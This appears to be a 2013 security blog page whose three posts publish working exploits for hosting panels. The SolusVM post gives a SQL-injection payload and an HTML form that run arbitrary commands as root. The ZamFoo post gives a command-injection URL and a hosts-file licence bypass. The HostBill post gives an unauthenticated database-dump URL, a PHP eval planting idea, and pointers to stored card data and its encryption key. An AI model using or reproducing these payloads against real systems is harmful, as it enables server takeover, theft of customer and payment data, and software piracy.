localhost
Random ramblings from someone working in InfoSec

contact me@localhost.re
archive - rss
2013/06/16

lolololo

Starting this post with that image seemed appropiate. This one is really easy and lots of servers use this crap called SolusVM.

/centralbackup.php:

<?php
if ($_POST['delete']) {
    $xc = $db -> query('SELECT * FROM centralbackup WHERE id = \'' . $_POST['deleteid'] . '\'', true);
    #[...]
    if ($xc[status] == 'failed') {
           exec('php /usr/local/solusvm/system/bus.php -- --comm=deletebackup --serverid=' . $xc['bserver'] . ' --nodeid=' . $vdata['nodeid'] . ' --vserverid=' . $vdata['vserverid'] . ' --filename=' . $xc['filename']);
    #[...]
    }
 }
?>

So what do we have here? SQL Injection? yup! exec()? yup! vulnerable binary that sets setuid to 0? yup!

Let's exploit this, shall we? It's easy, I promise! 3 easy steps!

  • Get yourself an active user with an active VM
  • Log in, click on the VM, copy the GET _v value
  • POST to /centralbackup.php?_v=[value]

delete=1&deleteid=-1' union select 0,0,0,0,0,'failed',';/usr/local/solusvm/core/solusvmc-node --ebtables ";command to run as root";',0#

Or just use this fancy HTML form:

<html><body>
    <script>
    function construct() {
        var sql='-1\' union select 0,0,0,0,0,\'failed\',\';/usr/local/solusvm/core/solusvmc-node --ebtables ";'+document.forms['form']['deleteid'].value+'";\',0#';
        document.forms['form']['deleteid'].value=sql;
        return true;
    }
    </script>
    <form name='form' method='post' action='http://CHANGE_ME:5353/centralbackup.php?_v=CHANGE_ME' onsubmit="return construct();">
    <input type='hidden' name='delete' value='1'>
    CMD: <input type='text' name='deleteid' size='100'>
    <br><input type='submit'>
    </form>
</body></html>

And, as a bonus, here's something to help you pwn. Just wget it to /usr/local/solusvm/www/rofl.php

It can run a command on all nodes, show decrypted passwords for all the users, etc.

go go go

Have fun!

2013/06/15

Soo... I've been following a thread on Webhostingtalk where two security researchers are trying to get a vulnerability patched.

Well, in like 5 minutes, I found the little bugger. And since the original researchers have decided not to release it.. here is mine :)

All you need to do is run this url as a reseller and insert the command you wish to run and it will be executed as root.

/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command`

Pretty slick. The new patch out today is still vulnerable aswell..

must see

BTW you can basically null this software and access all of the cgi files except the main menu by adding this into your /etc/hosts file

127.0.0.1 zamfoo.com www.zamfoo.com
2013/05/29

Another day, another billing panel. Found a sweet vulnerability in HostBill "Security is critical".

Entire database dump written to a file of our choice. Super-duper validation of access level (none).

/includes/cpupdate.php?do=backup&filename=../templates_c/DB_Dump.txt&login_username=0&password=0

must see

You can also use POST.

Oh, and if really wanted to, you can modify your client name or something to <?php eval(...); ?> and set the filename extension to php. Credit cards are stored in the database, encryption key is in /includes/config.php

PS: In case you wanted to report this vulnerability to them it costs only $75. No other way to contact them.